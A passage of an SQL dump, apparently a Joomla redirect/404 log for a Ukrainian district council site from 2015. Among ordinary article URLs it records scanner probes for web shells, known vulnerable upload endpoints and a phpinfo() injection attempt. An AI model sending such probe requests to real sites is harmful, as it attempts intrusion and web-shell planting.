00:00:00',301),(14735,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=471:2011-11-21-08-33-43&lang=ru&option=com_content&view=article','','','',5,0,'2015-08-24 22:10:00','0000-00-00 00:00:00',301),(14736,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=38:--19122011-&id=465:-l-r-2011-&itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-25 04:11:45','0000-00-00 00:00:00',301),(14737,'http://malyn-rayrada.org.ua/images/stories/byz.php?baca','','','',2,0,'2015-08-25 06:59:36','0000-00-00 00:00:00',301),(14738,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=38:--19122011-&id=465:-l-r-2011-&itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-25 14:47:18','0000-00-00 00:00:00',301),(14739,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1240:2014-03-17-07-01-32&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-25 17:54:57','0000-00-00 00:00:00',301),(14740,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1008:2013-05-20-07-02-57&lang=en&option=com_content&view=article','','','',1,0,'2015-08-26 05:57:56','0000-00-00 00:00:00',301),(14741,'http://www.malyn-rayrada.org.ua/index.php?Itemid=42&catid=20&id=186:-6-&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-26 10:29:49','0000-00-00 00:00:00',301),(14742,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1372:2014-08-04-19-26-16&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-26 12:06:13','0000-00-00 00:00:00',301),(14743,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=313:-2011-2015-&lang=uk&option=com_content&view=article','','','',5,0,'2015-08-26 15:44:11','0000-00-00 00:00:00',301),(14744,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=713:2012-06-14-15-13-57&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-26 17:53:20','0000-00-00 00:00:00',301),(14745,'http://www.malyn-rayrada.org.ua/index.php?Itemid=108&catid=60:--11072014-&id=1362:-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-26 21:52:00','0000-00-00 00:00:00',301),(14746,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=521:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-26 23:20:41','0000-00-00 00:00:00',301),(14747,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=198:------------2006-2010-r&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-27 01:39:15','0000-00-00 00:00:00',301),(14748,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=748:2012-08-12-17-56-55&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-27 02:20:54','0000-00-00 00:00:00',301),(14749,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1043:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-27 04:46:29','0000-00-00 00:00:00',301),(14750,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1210:2014-02-03-13-20-51&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-27 05:23:41','0000-00-00 00:00:00',301),(14751,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=958:-2010-2015-&lang=uk&option=com_content&view=article','','','',5,0,'2015-08-27 06:13:18','0000-00-00 00:00:00',301),(14752,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1252:2014-03-24-17-19-07&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-27 06:57:13','0000-00-00 00:00:00',301),(14753,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1064:2013-08-09-07-52-21&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-27 16:05:35','0000-00-00 00:00:00',301),(14754,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1192:-2014-2015-&lang=ru&option=com_content&view=article','','','',4,0,'2015-08-27 16:37:51','0000-00-00 00:00:00',301),(14755,'http://www.malyn-rayrada.org.ua/www.gismeteo.ua/ajax/getInformer/?hash=uq3yNrQhe5ru7h','','','',2,0,'2015-08-27 18:01:42','0000-00-00 00:00:00',301),(14756,'http://www.malyn-rayrada.org.ua/tmp/xmlrpc.php','','','',1,0,'2015-08-27 23:52:43','0000-00-00 00:00:00',301),(14757,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=3&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2015-08-28 11:46:32','0000-00-00 00:00:00',301),(14758,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1242:-25-2011-74-19-2011-193-&lang=en&option=com_content&view=article','','','',1,0,'2015-08-28 11:46:33','0000-00-00 00:00:00',301),(14759,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1328:2014-06-01-11-58-56&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-28 13:17:41','0000-00-00 00:00:00',301),(14760,'http://www.malyn-rayrada.org.ua/images/phocadownload/file.php','','','',1,0,'2015-08-29 19:09:17','0000-00-00 00:00:00',301),(14761,'http://www.malyn-rayrada.org.ua/images/Grufarma/xml.php','','','',1,0,'2015-08-29 19:09:19','0000-00-00 00:00:00',301),(14762,'http://www.malyn-rayrada.org.ua/images/BiogenFarma/defines.php','','','',1,0,'2015-08-29 19:09:20','0000-00-00 00:00:00',301),(14763,'http://www.malyn-rayrada.org.ua/images/stories/user.php','','','',1,0,'2015-08-29 19:09:21','0000-00-00 00:00:00',301),(14764,'http://www.malyn-rayrada.org.ua/images/stories/dir.php','','','',1,0,'2015-08-29 19:09:23','0000-00-00 00:00:00',301),(14765,'http://www.malyn-rayrada.org.ua/images/pestanasotc/article.php','','','',1,0,'2015-08-29 19:09:24','0000-00-00 00:00:00',301),(14766,'http://www.malyn-rayrada.org.ua/images/pestanasotc/plugin.php','','','',1,0,'2015-08-29 19:09:25','0000-00-00 00:00:00',301),(14767,'http://www.malyn-rayrada.org.ua/images/pestanasotc/sql.php','','','',1,0,'2015-08-29 19:09:26','0000-00-00 00:00:00',301),(14768,'http://www.malyn-rayrada.org.ua/images/sampledata/themes.php','','','',1,0,'2015-08-29 19:09:27','0000-00-00 00:00:00',301),(14769,'http://www.malyn-rayrada.org.ua/tmp/JoomFish_2.1.7/test.php','','','',1,0,'2015-08-29 19:09:29','0000-00-00 00:00:00',301),(14770,'http://www.malyn-rayrada.org.ua/tmp/j.php','','','',1,0,'2015-08-29 19:09:30','0000-00-00 00:00:00',301),(14771,'http://www.malyn-rayrada.org.ua/images/inc.php','','','',1,0,'2015-08-29 19:09:34','0000-00-00 00:00:00',301),(14772,'http://www.malyn-rayrada.org.ua/images/stories/story.php','','','',1,0,'2015-08-29 19:09:35','0000-00-00 00:00:00',301),(14773,'http://www.malyn-rayrada.org.ua/tmp/sfx.php','','','',1,0,'2015-08-29 19:09:37','0000-00-00 00:00:00',301),(14774,'http://malyn-rayrada.org.ua/plus/e7xue.php','','','',1,0,'2015-08-31 20:44:03','0000-00-00 00:00:00',301),(14775,'http://malyn-rayrada.org.ua/plus/mybak.php','','','',1,0,'2015-08-31 21:29:38','0000-00-00 00:00:00',301),(14776,'http://malyn-rayrada.org.ua/plus/xsvip.php','','','',1,0,'2015-08-31 22:14:44','0000-00-00 00:00:00',301),(14777,'http://malyn-rayrada.org.ua/plus/laobiao.php','','','',1,0,'2015-08-31 22:58:53','0000-00-00 00:00:00',301),(14778,'http://malyn-rayrada.org.ua/xiaolei.php','','','',1,0,'2015-08-31 23:44:57','0000-00-00 00:00:00',301),(14779,'http://malyn-rayrada.org.ua/dxyylc/md5.php','','','',1,0,'2015-09-01 00:27:47','0000-00-00 00:00:00',301),(14780,'http://malyn-rayrada.org.ua/plus/bakup.php','','','',1,0,'2015-09-01 01:12:30','0000-00-00 00:00:00',301),(14781,'http://malyn-rayrada.org.ua/include/code/mp.php','','','',1,0,'2015-09-01 01:58:34','0000-00-00 00:00:00',301),(14782,'http://malyn-rayrada.org.ua/templets/plus/sky.php','','','',1,0,'2015-09-01 02:44:20','0000-00-00 00:00:00',301),(14783,'http://malyn-rayrada.org.ua/plus/mytag_j.php?aid=6022','','','',1,0,'2015-09-01 03:33:45','0000-00-00 00:00:00',301),(14784,'http://malyn-rayrada.org.ua/plus/mytag_js.php?aid=9090','','','',1,0,'2015-09-01 04:22:29','0000-00-00 00:00:00',301),(14785,'http://www.malyn-rayrada.org.ua/images/banners/banner.php','','','',1,0,'2015-09-01 21:11:47','0000-00-00 00:00:00',301),(14786,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/847-pro-vnesennja-zmin-do-rajonnoi-programi_5','',1,0,'2015-09-02 18:37:11','0000-00-00 00:00:00',301),(14787,'http://malyn-rayrada.org.ua/index.php/1174-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',6,0,'2015-09-03 17:30:50','0000-00-00 00:00:00',301),(14788,'http://malyn-rayrada.org.ua/index.php/1174-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&prin','','','',1,0,'2015-09-03 17:34:47','0000-00-00 00:00:00',301),(14789,'http://www.malyn-rayrada.org.ua/index.php/1174-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',26,0,'2015-09-03 19:44:36','0000-00-00 00:00:00',301),(14790,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=777:2012-10-02-10-06-36&lang=ru&option=com_content&view=article','','','',4,0,'2015-09-05 14:31:05','0000-00-00 00:00:00',301),(14791,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1375:-33-6-&lang=uk&option=com_content&view=article','','','',2,0,'2015-09-05 23:16:50','0000-00-00 00:00:00',301),(14792,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=765:-qq&lang=uk&option=com_content&view=article','','','',3,0,'2015-09-06 02:51:40','0000-00-00 00:00:00',301),(14793,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1355:2014-07-02-06-11-04&lang=ru&option=com_content&view=article','','','',1,0,'2015-09-06 07:51:13','0000-00-00 00:00:00',301),(14794,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1258:2014-03-31-06-18-35&lang=ru&option=com_content&view=article','','','',1,0,'2015-09-06 08:49:17','0000-00-00 00:00:00',301),(14795,'http://www.malyn-rayrada.org.ua/wp-content/plugins/revslider/temp/update_extract/revslider/votre.php','','','',1,0,'2015-09-06 15:54:42','0000-00-00 00:00:00',301),(14796,'http://www.malyn-rayrada.org.ua/wp-content/plugins/showbiz/temp/update_extract/showbiz/wp-feed-file.php','','','',1,0,'2015-09-06 15:54:46','0000-00-00 00:00:00',301),(14797,'http://www.malyn-rayrada.org.ua/index.php/1177-vitaemo-iz-svyatom-pershogo-dzvonika; http:/www.malin-rda.gov.ua/8-novini/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/1177-vitaemo-iz-svyatom-pershogo-dzvonika;%20http:/www.malin-rda.gov.ua/8-novini/157-z-dnem-znan.html','',1,0,'2015-09-07 06:29:59','0000-00-00 00:00:00',301),(14798,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=325:2011-05-20-16-14-21&lang=uk&option=com_content&view=article','','','',3,0,'2015-09-07 07:59:53','0000-00-00 00:00:00',301),(14799,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=550:2012-01-26-12-39-51&lang=ru&option=com_content&view=article','','','',2,0,'2015-09-07 11:08:53','0000-00-00 00:00:00',301),(14800,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1064:2013-08-09-07-52-21&lang=ru&option=com_content&view=article','','','',2,0,'2015-09-07 13:09:34','0000-00-00 00:00:00',301),(14801,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1289:2014-04-23-06-53-01&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-07 18:43:26','0000-00-00 00:00:00',301),(14802,'http://malyn-rayrada.org.ua/components/com_banners/banners.html.php','','','',1,0,'2015-09-08 01:16:11','0000-00-00 00:00:00',301),(14803,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&catid=44&id=757:2012-09-12-09-47-49&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-08 03:45:09','0000-00-00 00:00:00',301),(14804,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=876:2012-12-18-09-32-45&lang=uk&option=com_content&view=article','','','',2,0,'2015-09-08 06:03:50','0000-00-00 00:00:00',301),(14805,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=840:-2007-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-08 06:50:55','0000-00-00 00:00:00',301),(14806,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=836:-6732012&lang=uk&option=com_content&view=article','','','',3,0,'2015-09-08 14:23:30','0000-00-00 00:00:00',301),(14807,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=984:-20-&lang=ru&option=com_content&view=article','','','',1,0,'2015-09-08 14:23:31','0000-00-00 00:00:00',301),(14808,'http://malyn-rayrada.org.ua/modules/mod_poll/cache.php','','','',1,0,'2015-09-08 18:32:48','0000-00-00 00:00:00',301),(14809,'http://malyn-rayrada.org.ua/administrator/includes/database.php','','','',1,0,'2015-09-08 23:39:19','0000-00-00 00:00:00',301),(14810,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=471:2011-11-21-08-33-43&lang=uk&option=com_content&view=article','','','',2,0,'2015-09-08 23:57:22','0000-00-00 00:00:00',301),(14811,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=325:2011-05-20-16-14-21&lang=ru&option=com_content&view=article','','','',3,0,'2015-09-09 01:50:17','0000-00-00 00:00:00',301),(14812,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=311:-v-&lang=uk&option=com_content&view=article','','','',2,0,'2015-09-09 01:50:19','0000-00-00 00:00:00',301),(14813,'http://malyn-rayrada.org.ua/includes/framework.api.php','','','',1,0,'2015-09-09 10:36:56','0000-00-00 00:00:00',301),(14814,'http://malyn-rayrada.org.ua/administrator/includes/phpconf.php','','','',1,0,'2015-09-09 20:58:16','0000-00-00 00:00:00',301),(14815,'http://malyn-rayrada.org.ua/images/jupload.php','','','',1,0,'2015-09-10 00:07:43','0000-00-00 00:00:00',301),(14816,'http://malyn-rayrada.org.ua/license.php','','','',7,0,'2015-09-12 07:51:53','0000-00-00 00:00:00',301),(14817,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=716:2012-06-14-15-19-24&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-12 07:55:35','0000-00-00 00:00:00',301),(14818,'http://malyn-rayrada.org.ua/modules/mod_feed/ms-default-base.php','','','',1,0,'2015-09-13 02:21:06','0000-00-00 00:00:00',301),(14819,'http://malyn-rayrada.org.ua/images/stories/story.php?p1=phpinfo();','','','',1,0,'2015-09-13 08:18:17','0000-00-00 00:00:00',301),(14820,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1237:-200-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',2,0,'2015-09-14 05:15:13','0000-00-00 00:00:00',301),(14821,'http://malyn-rayrada.org.ua/templates/system/html/gif.php','','','',1,0,'2015-09-15 03:28:36','0000-00-00 00:00:00',301),(14822,'http://malyn-rayrada.org.ua/LICESNE.php','','','',1,0,'2015-09-15 06:06:37','0000-00-00 00:00:00',301),(14823,'http://malyn-rayrada.org.ua/modules/mod_rssemailer/mod_rssemailer.php','','','',1,0,'2015-09-16 00:36:58','0000-00-00 00:00:00',301),(14824,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/778-informacija-st-vorob-ivskoi-silskoi-radi','','http://go.mail.ru/search_images','',1,0,'2015-09-16 01:35:12','0000-00-00 00:00:00',301),(14825,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1370:31-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2015-09-16 15:41:43','0000-00-00 00:00:00',301),(14826,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1273:2014-04-10-06-15-24&lang=uk&option=com_content&view=article','','','',1,0,'2015-09-17 14:13:58','0000-00-00 00:00:00',301),(14827,'http://malyn-rayrada.org.ua/robots.php','','','',1,0,'2015-09-18 11:56:50','0000-00-00 00:00:00',301),(14828,'http://malyn-rayrada.org.ua/wp-content/themes/ProjectTheme/lib/upload_main/upload.php?folder=/wp-content/uploads/','','http://malyn-rayrada.org.ua/wp-content/themes/ProjectTheme/lib/upload_main/upload.php?folder=/wp-content/uploads/','',2,0,'2015-09-18 13:44:49','0000-00-00 00:00:00',301),(14829,'http://malyn-rayrada.org.ua/wp-content/uploads/sys.php','','','',2,0,'2015-09-18 13:44:49','0000-00-00 00:00:00',301),(14830,'http://malyn-rayrada.org.ua/sys.php','','','',1,0,'2015-09-18 13:44:52','0000-00-00 00:00:00',301),(14831,'http://malyn-rayrada.org.ua/uploadify/uploadify.php','','http://malyn-rayrada.org.ua/uploadify/uploadify.php','',2,0,'2015-09-18 13:44:51','0000-00-00 00:00:00',301),(14832,'http://malyn-rayrada.org.ua/wp-content/plugins/revslider/temp/update_extract/sys.php','','','',1,0,'2015-09-18 13:44:54','0000-00-00 00:00:00',301),(14833,'http://malyn-rayrada.org.ua/php-ofc-library/ofc_upload_image.php?name=sys.php','','http://malyn-rayrada.org.ua/php-ofc-library/ofc_upload_image.php?name=sys.php','',1,0,'2015-09-18 13:44:56','0000-00-00 00:00:00',301),(14834,'http://malyn-rayrada.org.ua/tmp-upload-images/sys.php','','','',1,0,'2015-09-18 13:44:57','0000-00-00 00:00:00',301),(14835,'http://malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/files/sys.php','','','',1,0,'2015-09-18 13:45:00','0000-00-00 00:00:00',301),(14836,'http://malyn-rayrada.org.ua/plugins/editor.zoho/agent/save_zoho.php','','','',2,0,'2015-09-18 13:45:05','0000-00-00 00:00:00',301),(14837,'http://malyn-rayrada.org.ua/sites/all/libraries/elfinder/elfinder.html','','','',2,0,'2015-09-18 13:45:06','0000-00-00 00:00:00',301),(14838,'http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=sys.php','','http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=sys.php','',1,0,'2015-09-18 13:45:08','0000-00-00 00:00:00',301),(14839,'http://malyn-rayrada.org.ua/wp-content/plugins/wpallimport/sys.php','','','',1,0,'2015-09-18 13:45:09','0000-00-00 00:00:00',301),(14840,'http://malyn-rayrada.org.ua/server/php/','','http://malyn-rayrada.org.ua/server/php/','',2,0,'2015-09-18 13:45:11','0000-00-00 00:00:00',301),(14841,'http://malyn-rayrada.org.ua/server/php/files/sys.php','','','',1,0,'2015-09-18 13:45:12','0000-00-00 00:00:00',301),(14842,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1200-pro-povtorne-zvernennya-do-prokuraturi-malinskog','',30,0,'2015-09-18 13:51:38','0000-00-00 00:00:00',301),(14843,'http://malyn-rayrada.org.ua/index.php/1187-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-42-sesiyu-rajonnoji-radi-6-sklikannya','','','',10,0,'2015-09-18 23:20:43','0000-00-00 00:00:00',301),(14844,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1189-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',8,0,'2015-09-18 23:21:52','0000-00-00 00:00:00',301),(14845,'http://www.malyn-rayrada.org.ua/index.php/1187-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-42-sesiyu-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-09-18 23:31:16','0000-00-00 00:00:00',301),(14846,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1189-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-09-19 00:51:32','0000-00-00 00:00:00',301),(14847,'http://www.malyn-rayrada.org.ua/index.php/1187-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-42-sesiyu-rajonnoji-radi-6-sklikannya','','','',12,0,'2015-09-19 01:44:01','0000-00-00 00:00:00',301),(14848,'http://malyn-rayrada.org.ua/index.php?option=com_tags&task=tags.searchAjax','','','',1,0,'2015-09-19 10:29:26','0000-00-00 00:00:00',301),(14849,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1189-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-09-20 02:43:13','0000-00-00 00:00:00',301),(14850,'http://malyn-rayrada.org.ua/media/system/js/cms.php','','','',1,0,'2015-09-20 08:06:37','0000-00-00 00:00:00',301),(14851,'http://malyn-rayrada.org.ua/attachments/article/1195/Діброва(1).pdf','','','',1,0,'2015-09-21 08:50:22','0000-00-00 00:00:00',301),(14852,'http://malyn-rayrada.org.ua/www.gismeteo.ua/ua/weather-malin-12024/','','','',1,0,'2015-09-21 08:50:58','0000-00-00 00:00:00',301),(14853,'http://malyn-rayrada.org.ua/www.gismeteo.ua/ua','','','',1,0,'2015-09-21 08:51:00','0000-00-00 00:00:00',301),(14854,'http://malyn-rayrada.org.ua/attachments/article/1122/Зайцева.pdf','','','',1,0,'2015-09-21 08:54:24','0000-00-00 00:00:00',301),(14855,'http://malyn-rayrada.org.ua/attachments/article/1122/Захарчук.pdf','','','',1,0,'2015-09-21 08:54:26','0000-00-00 00:00:00',301),(14856,'http://malyn-rayrada.org.ua/attachments/article/1122/Малегус.pdf','','','',1,0,'2015-09-21 08:54:28','0000-00-00 00:00:00',301),(14857,'http://malyn-rayrada.org.ua/attachments/article/1122/Пустовойтенко.pdf','','','',1,0,'2015-09-21 08:54:29','0000-00-00 00:00:00',301),(14858,'http://malyn-rayrada.org.ua/attachments/article/1122/Тиднюк.pdf','','','',1,0,'2015-09-21 08:54:31','0000-00-00 00:00:00',301),(14859,'http://malyn-rayrada.org.ua/attachments/article/1122/Чапік.pdf','','','',1,0,'2015-09-21 08:54:33','0000-00-00 00:00:00',301),(14860,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=758:--15---&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',2,0,'2015-09-21 09:11:30','0000-00-00 00:00:00',301),(14861,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1189-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',19,0,'2015-09-21 12:58:52','0000-00-00 00:00:00',301),(14862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=954:-19-6-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',2,0,'2015-09-22 03:30:59','0000-00-00 00:00:00',301),(14863,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1219:-2004-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2015-09-22 08:10:39','0000-00-00 00:00:00',301),(14864,'http://www.malyn-rayrada.org.ua/attachments/article/1195/Діброва(1).pdf','','','',4,0,'2015-09-22 09:43:10','0000-00-00 00:00:00',301),(14865,'http://malyn-rayrada.org.ua/components/gif.php','','','',1,0,'2015-09-22 13:53:26','0000-00-00 00:00:00',301),(14866,'http://malyn-rayrada.org.ua/modules/mod_rokgallery/gif.php','','','',1,0,'2015-09-22 15:10:25','0000-00-00 00:00:00',301),(14867,'http://malyn-rayrada.org.ua/libraries/joomla/html/parameter/element/checkbox.php','','','',1,0,'2015-09-22 15:35:31','0000-00-00 00:00:00',301),(14868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311%3A-v-&catid=33&Itemid=66&lang=uk','','','',16,0,'2015-09-23 00:35:59','0000-00-00 00:00:00',301),(14869,'http://malyn-rayrada.org.ua/sitemap.xml.php','','','',1,0,'2015-09-23 06:32:38','0000-00-00 00:00:00',301),(14870,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&catid=44&id=757:2012-09-12-09-47-49&lang=ru&option=com_content&view=article','','','',1,0,'2015-09-24 05:00:10','0000-00-00 00:00:00',301),(14871,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=uk&Itemid=','','','',1,0,'2015-09-24 11:25:47','0000-00-00 00:00:00',301),(14872,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-09-24 12:59:33','0000-00-00 00:00:00',301),(14873,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-09-24 13:12:01','0000-00-00 00:00:00',301),(14874,'http://malyn-rayrada.org.ua/index.php/448-v-s-zhuravskij-budu-perekonuvati-svoih-koleg?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-09-25 00:36:41','0000-00-00 00:00:00',301),(14875,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=438:-----------l--r&lang=uk&option=com_content&view=article','','','',3,0,'2015-09-25 01:30:56','0000-00-00 00:00:00',301),(14876,'http://malyn-rayrada.org.ua/index2.php?z','','','',1,0,'2015-09-25 19:26:01','0000-00-00 00:00:00',301),(14877,'http://malyn-rayrada.org.ua/plugins/content/pagebreak/page.php','','','',1,0,'2015-09-26 00:05:27','0000-00-00 00:00:00',301),(14878,'http://malyn-rayrada.org.ua/tmp/j.php','','','',1,0,'2015-09-26 00:17:36','0000-00-00 00:00:00',301),(14879,'http://malyn-rayrada.org.ua/tmp/k.php','','','',1,0,'2015-09-26 14:26:05','0000-00-00 00:00:00',301),(14880,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1201-pro-zapit-deputata-nedashkivskogo-s-p-shchodo-zabezpechennya-zhiteliv-sil-malinskogo-rajonu-skraplenim-gazom','','','',6,0,'2015-09-26 19:39:02','0000-00-00 00:00:00',301),(14881,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=792:2012-10-17-06-26-37&lang=ru&option=com_content&view=article','','','',3,0,'2015-09-27 00:27:45','0000-00-00 00:00:00',301),(14882,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1201-pro-zapit-deputata-nedashkivskogo-s-p-shchodo-zabezpechennya-zhiteliv-sil-malinskogo-rajonu-skraplenim-gazom?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-09-27 13:35:39','0000-00-00 00:00:00',301),(14883,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1233:2014-03-03-10-28-35&lang=ru&option=com_content&view=article','','','',1,0,'2015-09-27 21:10:52','0000-00-00 00:00:00',301),(14884,'http://malyn-rayrada.org.ua/tmp/a.php','','','',1,0,'2015-09-27 22:15:17','0000-00-00 00:00:00',301),(14885,'http://malyn-rayrada.org.ua/components/a.php','','','',1,0,'2015-09-27 22:55:51','0000-00-00 00:00:00',301),(14886,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1201-pro-zapit-deputata-nedashkivskogo-s-p-shchodo-zabezpechennya-zhiteliv-sil-malinskogo-rajonu-skraplenim-gazom','','','',27,0,'2015-09-29 06:41:13','0000-00-00 00:00:00',301),(14887,'http://www.malyn-rayrada.org.ua/apple-app-site-association','','','',2,0,'2015-09-30 02:59:48','0000-00-00 